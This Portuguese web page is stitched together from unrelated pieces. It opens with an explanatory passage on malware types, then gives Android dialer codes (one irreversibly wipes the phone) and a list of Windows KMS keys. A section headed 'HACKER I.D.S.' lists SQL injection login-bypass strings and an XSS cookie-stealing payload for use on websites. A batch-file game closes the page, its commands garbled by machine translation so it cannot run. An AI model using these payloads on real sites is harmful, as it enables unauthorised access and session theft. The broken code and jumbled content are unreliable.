A comunicao entre o invasor e o computador infectado pelo bot pode ocorrer via canais de IRC, servidores Web e redes do tipo P2P, entre outros meios. Ao se comunicar, o invasor pode enviar instrues para que aes maliciosas sejam executadas, como desferir ataques, furtar dados do computador infectado e enviar spam.

Um computador infectado por um bot costuma ser chamado de zumbi (zombie computer), pois pode ser controlado remotamente, sem o conhecimento do seu dono. Tambm pode ser chamado de spam zombie quando o bot instalado o transforma em um servidor de e-mails e o utiliza para o envio de spam.

Botnet uma rede formada por centenas ou milhares de computadores zumbis e que permite potencializar as aes danosas executadas pelos bots.

Quanto mais zumbis participarem da botnet mais potente ela ser. O atacante que a controlar, alm de us-la para seus prprios ataques, tambm pode alug-la para outras pessoas ou grupos que desejem que uma ao maliciosa especfica seja executada.

Algumas das aes maliciosas que costumam ser executadas por intermdio de botnets so: ataques de negao de servio, propagao de cdigos maliciosos (inclusive do prprio bot), coleta de informaes de um grande nmero de computadores, envio de spam e camuflagem da identidade do atacante (com o uso de proxies instalados nos zumbis).

O esquema simplificado apresentado a seguir exemplifica o funcionamento bsico de uma botnet:

Um atacante propaga um tipo especfico de bot na esperana de infectar e conseguir a maior quantidade possvel de zumbis;os zumbis ficam ento disposio do atacante, agora seu controlador, espera dos comandos a serem executados;quando o controlador deseja que uma ao seja realizada, ele envia aos zumbis os comandos a serem executados, usando, por exemplo, redes do tipo P2P ou servidores centralizados;os zumbis executam ento os comandos recebidos, durante o perodo predeterminado pelo controlador;quando a ao se encerra, os zumbis voltam a ficar espera dos prximos comandos a serem executados.4.4. Spyware

Spyware um programa projetado para monitorar as atividades de um sistema e enviar as informaes coletadas para terceiros.

Pode ser usado tanto de forma legtima quanto maliciosa, dependendo de como instalado, das aes realizadas, do tipo de informao monitorada e do uso que feito por quem recebe as informaes coletadas. Pode ser considerado de uso:

Legtimo: quando instalado em um computador pessoal, pelo prprio dono ou com consentimento deste, com o objetivo de verificar se outras pessoas o esto utilizando de modo abusivo ou no autorizado.Malicioso: quando executa aes que podem comprometer a privacidade do usurio e a segurana do computador, como monitorar e capturar informaes referentes navegao do usurio ou inseridas em outros programas (por exemplo, conta de usurio e senha).Alguns tipos especficos de programas spyware so:

Keylogger: capaz de capturar e armazenar as teclas digitadas pelo usurio no teclado do computador. Sua ativao, em muitos casos, condicionada a uma ao prvia do usurio, como o acesso a um site especfico de comrcio eletrnico ou de Internet Banking.

Screenlogger: similar ao keylogger, capaz de armazenar a posio do cursor e a tela apresentada no monitor, nos momentos em que o mouse clicado, ou a regio que circunda a posio onde o mouse clicado. bastante utilizado por atacantes para capturar as teclas digitadas pelos usurios em teclados virtuais, disponveis principalmente em sites de Internet Banking.

Adware: projetado especificamente para apresentar propagandas. Pode ser usado para fins legtimos, quando incorporado a programas e servios, como forma de patrocnio ou retorno financeiro para quem desenvolve programas livres ou presta servios gratuitos. Tambm pode ser usado para fins maliciosos, quando as propagandas apresentadas so direcionadas, de acordo com a navegao do usurio e sem que este saiba que tal monitoramento est sendo feito.

4.5. Backdoor

Backdoor um programa que permite o retorno de um invasor a um computador comprometido, por meio da incluso de servios criados ou modificados para este fim.

Pode ser includo pela ao de outros cdigos maliciosos, que tenham previamente infectado o computador, ou por atacantes, que exploram vulnerabilidades existentes nos programas instalados no computador para invadi-lo.

Aps includo, o backdoor usado para assegurar o acesso futuro ao computador comprometido, permitindo que ele seja acessado remotamente, sem que haja necessidade de recorrer novamente aos mtodos utilizados na realizao da invaso ou infeco e, na maioria dos casos, sem que seja notado.

A forma usual de incluso de um backdoor consiste na disponibilizao de um novo servio ou na substituio de um determinado servio por uma verso alterada, normalmente possuindo recursos que permitem o acesso remoto. Programas de administrao remota, como BackOrifice, NetBus, SubSeven, VNC e Radmin, se mal configurados ou utilizados sem o consentimento do usurio, tambm podem ser classificados como backdoors.

H casos de backdoors includos propositalmente por fabricantes de programas, sob alegao de necessidades administrativas. Esses casos constituem uma sria ameaa segurana de um computador que contenha um destes programas instalados pois, alm de comprometerem a privacidade do usurio, tambm podem ser usados por invasores para acessarem remotamente o computador.

4.6. Cavalo de troia (Trojan)

Cavalo de troia1, trojan ou trojan-horse, um programa que, alm de executar as funes para as quais foi aparentemente projetado, tambm executa outras funes, normalmente maliciosas, e sem o conhecimento do usurio.

Exemplos de trojans so programas que voc recebe ou obtm de sites na Internet e que parecem ser apenas cartes virtuais animados, lbuns de fotos, jogos e protetores de tela, entre outros. Estes programas, geralmente, consistem de um nico arquivo e necessitam ser explicitamente executados para que sejam instalados no computador.

Trojans tambm podem ser instalados por atacantes que, aps invadirem um computador, alteram programas j existentes para que, alm de continuarem a desempenhar as funes originais, tambm executem aes maliciosas.

H diferentes tipos de trojans, classificados2 de acordo com as aes maliciosas que costumam executar ao infectar um computador. Alguns destes tipos so:

Trojan Downloader: instala outros cdigos maliciosos, obtidos de sites na Internet.Trojan Dropper: instala outros cdigos maliciosos, embutidos no prprio cdigo do trojan.Trojan Backdoor: inclui backdoors, possibilitando o acesso remoto do atacante ao computador.Trojan DoS: instala ferramentas de negao de servio e as utiliza para desferir ataques.Trojan Destrutivo: altera/apaga arquivos e diretrios, formata o disco rgido e pode deixar o computador fora de operao.Trojan Clicker: redireciona a navegao do usurio para sites especficos, com o objetivo de aumentar a quantidade de acessos a estes sites ou apresentar propagandas.Trojan Proxy: instala um servidor de proxy, possibilitando que o computador seja utilizado para navegao annima e para envio de spam.Trojan Spy: instala programas spyware e os utiliza para coletar informaes sensveis, como senhas e nmeros de carto de crdito, e envi-las ao atacante.Trojan Banker ou Bancos: coleta dados bancrios do usurio, atravs da instalao de programas spyware que so ativados quando sites de Internet Banking so acessados. similar ao Trojan Spy porm com objetivos mais especficos.[1] O "Cavalo de Troia", segundo a mitologia grega, foi uma grande esttua, utilizada como instrumento de guerra pelos gregos para obter acesso cidade de Troia. A esttua do cavalo foi recheada com soldados que, durante a noite, abriram os portes da cidade possibilitando a entrada dos gregos e a dominao de Troia. voltar[2] Esta classificao baseia-se em coletnea feita sobre os nomes mais comumente usados pelos programas antimalware. voltar4.7. Rootkit

Rootkit3 um conjunto de programas e tcnicas que permite esconder e assegurar a presena de um invasor ou de outro cdigo malicioso em um computador comprometido.

O conjunto de programas e tcnicas fornecido pelos rootkits pode ser usado para:

remover evidncias em arquivos de logs (mais detalhes na Seo 7.6 do Captulo Mecanismos de segurana);instalar outros cdigos maliciosos, como backdoors, para assegurar o acesso futuro ao computador infectado;esconder atividades e informaes, como arquivos, diretrios, processos, chaves de registro, conexes de rede, etc;mapear potenciais vulnerabilidades em outros computadores, por meio de varreduras na rede;capturar informaes da rede onde o computador comprometido est localizado, pela interceptao de trfego. muito importante ressaltar que o nome rootkit no indica que os programas e as tcnicas que o compe so usadas para obter acesso privilegiado a um computador, mas sim para mant-lo.

Rootkits inicialmente eram usados por atacantes que, aps invadirem um computador, os instalavam para manter o acesso privilegiado, sem precisar recorrer novamente aos mtodos utilizados na invaso, e para esconder suas atividades do responsvel e/ou dos usurios do computador. Apesar de ainda serem bastante usados por atacantes, os rootkits atualmente tm sido tambm utilizados e incorporados por outros cdigos maliciosos para ficarem ocultos e no serem detectados pelo usurio e nem por mecanismos de proteo.

H casos de rootkits instalados propositalmente por empresas distribuidoras de CDs de msica, sob a alegao de necessidade de proteo aos direitos autorais de suas obras. A instalao nestes casos costumava ocorrer de forma automtica, no momento em que um dos CDs distribudos contendo o cdigo malicioso era inserido e executado. importante ressaltar que estes casos constituem uma sria ameaa segurana do computador, pois os rootkits instalados, alm de comprometerem a privacidade do usurio, tambm podem ser reconfigurados e utilizados para esconder a presena e os arquivos inseridos por atacantes ou por outros cdigos maliciosos.

[3] O termo rootkit origina-se da juno das palavras "root" (que corresponde conta de superusurio ou administrador do computador em sistemas Unix) e "kit" (que corresponde ao conjunto de programas usados para manter os privilgios de acesso desta conta). voltar4.8. Preveno

Para manter o seu computador livre da ao dos cdigos maliciosos existe um conjunto de medidas preventivas que voc precisa adotar. Essas medidas incluem manter os programas instalados com as verses mais recentes e com todas as atualizaes disponveis aplicadas e usar mecanismos de segurana, como antimalware e firewall pessoal.

Alm disso, h alguns cuidados que voc e todos que usam o seu computador devem tomar sempre que forem manipular arquivos. Novos cdigos maliciosos podem surgir, a velocidades nem sempre acompanhadas pela capacidade de atualizao dos mecanismos de segurana.

Informaes sobre os principais mecanismos de segurana que voc deve utilizar so apresentados no Captulo Mecanismos de segurana. Outros cuidados que voc deve tomar para manter seu computador seguro so apresentados no Captulo Segurana de computadores.

Cdigos secretos para telefones Android (HACKER I.D.S.)1. Informaes completas sobre o seu telefone*#*#4636#*#*Este cdigo pode ser usado para obter algumas informaes interessantes sobre o seu telefone ea bateria. Ele mostra seguintes 4 menus na tela:

informaes do telefoneinformaes sobre a bateriahistrico da bateriaestatsticas de utilizao

2. Dados de fbrica redefinir*#*#7780#*#*Este cdigo pode ser usado para uma redefinio de dados de fbrica. Ele vai remover as coisas seguintes:

Configuraes da conta Google armazenados em seu telefoneSistema e de aplicativos de dados e configuraesaplicativos baixados

NO vai remover:

Software do sistema atual e pacote de aplicativosSD card por exemplo, arquivos fotos, arquivos de msica, etc

Nota: Depois de dar este cdigo, voc recebe uma tela de aviso pedindo para clicar em "Reset telefone" . Ento voc tem a chance de cancelar a sua operao.

3. Formato do telefone Android*2767*3855#Pense antes de dar a este cdigo. Este cdigo utilizado para o formato de fbrica. Ele vai remover todos os arquivos e configuraes, incluindo o armazenamento de memria interna. Ele tambm vai reinstalar o firmware do telefone.Nota: Depois de dar este cdigo, no h maneira de cancelar a operao, a menos que voc remover a bateria do telefone. Ento, pense duas vezes antes de dar este cdigo.

4. Telefone com cmera Atualizao*#*#34971539#*#*Este cdigo utilizado para obter informaes sobre a cmera do telefone. Ele mostra seguintes 4 menus:

Atualizao do firmware da cmera na imagem (No tente essa opo)Atualizao do firmware da cmera em carto SDObter a verso do firmware da cmeraObter atualizao de firmware

AVISO: Nunca use a primeira opo, caso contrrio seu telefone com cmera ir parar de funcionar e voc precisa ter o seu telefone para centro de servios para reinstalar o firmware da cmera.

5. Chamada final / Power*#*#7594#*#*Este o meu favorito. Este cdigo pode ser usado para alterar o "End Call / Power" ao de boto no seu telefone. Ser padro, se voc pressione e segure o boto, ele mostra uma tela solicitando que voc selecione qualquer opo de modo silencioso, modo avio e Power off.Voc pode mudar essa ao usando este cdigo. Voc pode ativar poder direto off neste boto para que voc no precisa desperdiar seu tempo em selecionar a opo.

6. Copie o arquivo para a criao de backup*#*#273283*255*663282*#*#*Este cdigo abre uma tela de cpia de arquivos onde voc pode fazer backup de seus arquivos de mdia por exemplo, Imagens, som, vdeo e mensagem de voz.

7. modo de servio*#*#197328640#*#*Este cdigo pode ser usado para entrar em modo de servio. Voc pode executar vrios testes e alterar as configuraes no modo de servio.

8. WLAN, GPS e cdigos de teste Bluetooth:*#*#232339#*#* Ou *#*#526#*#* Ou *#*#528#*#* - WLAN teste (Use boto "Menu" para comear a vrios testes)*#*#232338#*#* - Mostra WiFi endereo MAC*#*#1472365#*#* - Testar GPS*#*#1575#*#* - Teste Outro GPS*#*#232331#*#* - Testar Bluetooth*#*#232337#*# - Mostra o endereo do dispositivo Bluetooth9. Cdigos para obter informaes sobre a verso do firmware:

*#*#4986*2650468#*#* - PDA, telefone, H / W, RFCallDate*#*#1234#*#* - PDA e telefone*#*#1111#*#* - FTA verso SW*#*#2222#*#* - FTA Verso HW*#*#44336#*#* - PDA, telefone, CSC, tempo de construo, nmero Changelist10. Cdigos para lanar vrios testes de fbrica:*#*#0283#*#* - Loopback de packs*#*#0*#*#* - LCD testar*#*#0673#*#* Ou*#*#0289#*#* - Testar Melody*#*#0842#*#* - Teste de dispositivo (Teste de vibrao e teste de contraluz)*#*#2663#*#* - Verso da tela de toque*#*#2664#*#* - Teste de tela de toque*#*#0588#*#* - Teste do sensor de proximidade*#*#3264#*#* - RAM verso

Ataques XSS e de SQL InjecT exemplos: ( HACKER I.D.S. )

Esse cdigo de SQL injection inserido no campo de Login ou Username de um site, onde faz com que ele se autentique como aquele usurio com uma senha qualquer:

or=1 ')or('a'='aor=1')or('1'='1ora=a'or'1'='1e colocado uma senha como: xxx

Esse cdigo Mostra a verso do Banco de Dados de MYSQL, onde user123 conhecido pelo Hacker: 'user123' or 1=(select @@version)-- ou ' union select @@version,1,1--

Vamos ao XSS (inserindo na URL):

Sequestrando Cookies:

'">alert('xss');alert(document.cookie) oualert('xss');alert(document.cookie)

Windows serial keys

Windows 7, 8, Server 2008 R2 and Server 2012 use the following keys for KMS activation;

Operating System Edition

Product Key

Windows 8.1

Windows 8.1 Professional

GCRJD-8NW9H-F2CDX-CCM8D-9D6T9

Windows 8.1 Professional N

HMCNV-VVBFX-7HMBH-CTY9B-B4FXY

Windows 8.1 Enterprise

MHF9N-XY6XB-WVXMC-BTDCT-MKKG7

Windows 8.1 Enterprise N

TT4HM-HN7YT-62K67-RGRQJ-JFFXW

Windows 8

Windows 8 Professional

NG4HW-VH26C-733KW-K6F98-J8CK4

Windows 8 Professional N

XCVCF-2NXM9-723PB-MHCB7-2RYQQ

Windows 8 Enterprise

32JNW-9KQ84-P47T8-D8GGY-CWCK7

Windows 8 Enterprise N

JMNMF-RHW7P-DMY6X-RF3DR-X2BQT

Windows 7

Windows 7 Professional

FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4

Windows 7 Professional N

MRPKT-YTG23-K7D7T-X2JMM-QY7MG

Windows 7 Enterprise

33PXH-7Y6KF-2VJC9-XBBR8-HVTHH

Windows 7 Enterprise N

YDRBP-3D83W-TY26F-D46B2-XCKRJ

Windows 7 Enterprise E

C29WB-22CC8-VJ326-GHFJW-H9DH4

Windows Server 2012 R2

Windows Server 2012 R2 Server Standard

D2N9P-3P6X9-2R39C-7RTCD-MDVJX

Windows Server 2012 R2 Datacenter

W3GGN-FT8W3-Y4M27-J84CP-Q3VJ9

Windows Server 2012 R2 Essentials

KNC87-3J2TX-XB4WP-VCPJV-M4FWM

Windows Server 2012

Windows Server 2012 Core

BN3D2-R7TKB-3YPBD-8DRP2-27GG4

Windows Server 2012 Core N

8N2M2-HWPGY-7PGT9-HGDD8-GVGGY

Windows Server 2012 Core Single Language

2WN2H-YGCQR-KFX6K-CD6TF-84YXQ

Windows Server 2012 Core Country Specific

4K36P-JN4VD-GDC6V-KDT89-DYFKP

Windows Server 2012 Server Standard

XC9B7-NBPP2-83J2H-RHMBY-92BT4

Windows Server 2012 Standard Core

XC9B7-NBPP2-83J2H-RHMBY-92BT4

Windows Server 2012 Multipoint Standard

HM7DN-YVMH3-46JC3-XYTG7-CYQJJ

Windows Server 2012 Multipoint Premium

XNH6W-2V9GX-RGJ4K-Y8X6F-QGJ2G

Windows Server 2012 Datacenter

48HP8-DN98B-MYWDG-T2DCC-8W83P

Windows Server 2012 Datacenter Core

48HP8-DN98B-MYWDG-T2DCC-8W83P

Windows Server 2008 R2

Windows Server 2008 R2 HPC Edition

FKJQ8-TMCVP-FRMR7-4WR42-3JCD7

Windows Server 2008 R2 Datacenter

74YFP-3QFB3-KQT8W-PMXWJ-7M648

Windows Server 2008 R2 Enterprise

489J6-VHDMP-X63PK-3K798-CPX3Y

Windows Server 2008 R2 for Itanium-Based Systems

GT63C-RJFQ3-4GMB6-BRFB9-CB83V

Windows Server 2008 R2 Standard

YC6KT-GKW9T-YTKYR-T4X34-R7VHC

Windows Web Server 2008 R2

6TPJF-RBVHG-WBW2R-86QPH-6RTM4

Show permanente arquivos protegidos escondido, escondido por vrus.Isso um truque de permanente mostra arquivos e pastas que so protegidos escondido:

1. aberto notepad2. e colar este cdigo

Attrib / d / s-h-s

3. save como. Arquivo bat e coloc-lo em qualquer pasta ou releg que contm escondido arquivos (mas no na c: drive)4.-runComo fazer um jogo em 1 minuto usando notepad

1. aberto notepad2. e colar este cdigo

@echo offCor b0Cardpio:Normas laborais fundamentais (cls)Eco tsehla! Bem vindo ao jogo!Eco 1) comear!Eco 2) como jogarEco 3) sada :,(Estabeleamos / p number=

Se % nmero 1 % == goto startgameSe % nmero 2 % == goto ajudarSe % nmero 3 % == goto sada

: startgameNormas laborais fundamentais (cls)Eco digite seu nome:Estabeleamos / p name=Eco aremoz % name %!Eco querem comear o questionrio? (y / n)Estabeleamos / p start=Se % encetam % ==goto level1Se % encetam % == n goto menuGoto startgame

: ajudarNormas laborais fundamentais (cls)Eco pressionar o nmero de a resposta depois aperte enter.Eco voltar? (y / n)Estabeleamos / p menugoto=Se % menugoto % ==goto menuSe % menugoto % == n goto sadaGoto ajudar

Sada:Goto sada

: level1Normas laborais fundamentais (cls)Eco ok, vamos comear.O que 10 + 10?Eco 1) 1Eco 2) 20Eco 3) 500

Estabeleamos / p answer1=Se 1 % answer1% == goto wrong1Se 2 % answer1% == goto correct1Se 3 % answer1% == goto wrong1Goto level1

: correct1Eco tem razo! Prximo nvel? (y / n)Estabeleamos / p nl1=

Se % nl1% ==goto level2Se % nl1% == n goto menuGoto correct1

: wrong1Infelizmente, o que voc estava errado. Retry? (y / n)Estabeleamos / p wa1=Se % wa1% ==goto level1Se % wa1% == n goto menuGoto wrong1

: level2

Normas laborais fundamentais (cls)O que est no 100 dollar bill?Eco 1) ben franklinEco 2) tommy kingEco 3) thomas tremEco 4) jeff dunhamEstabeleamos / p aa=Se 1 % aa % == goto correct2Se 1 % aa % == goto wrong2Se 1 % aa % == goto wrong2Se 1 % aa % == goto wrong2Goto level2

: correct2Normas laborais fundamentais (cls)Eco vc ganhar o jogo!Goto correct2

: wrong2Normas laborais fundamentais (cls)O que voc perdeu! Retry game? (y / n)Estabeleamos / p retry=Se % retry % ==goto level1Se % retry % == n goto sadaGoto wrong2

3. save como. Arquivo bat

4. corra e aproveiteEmoticon smile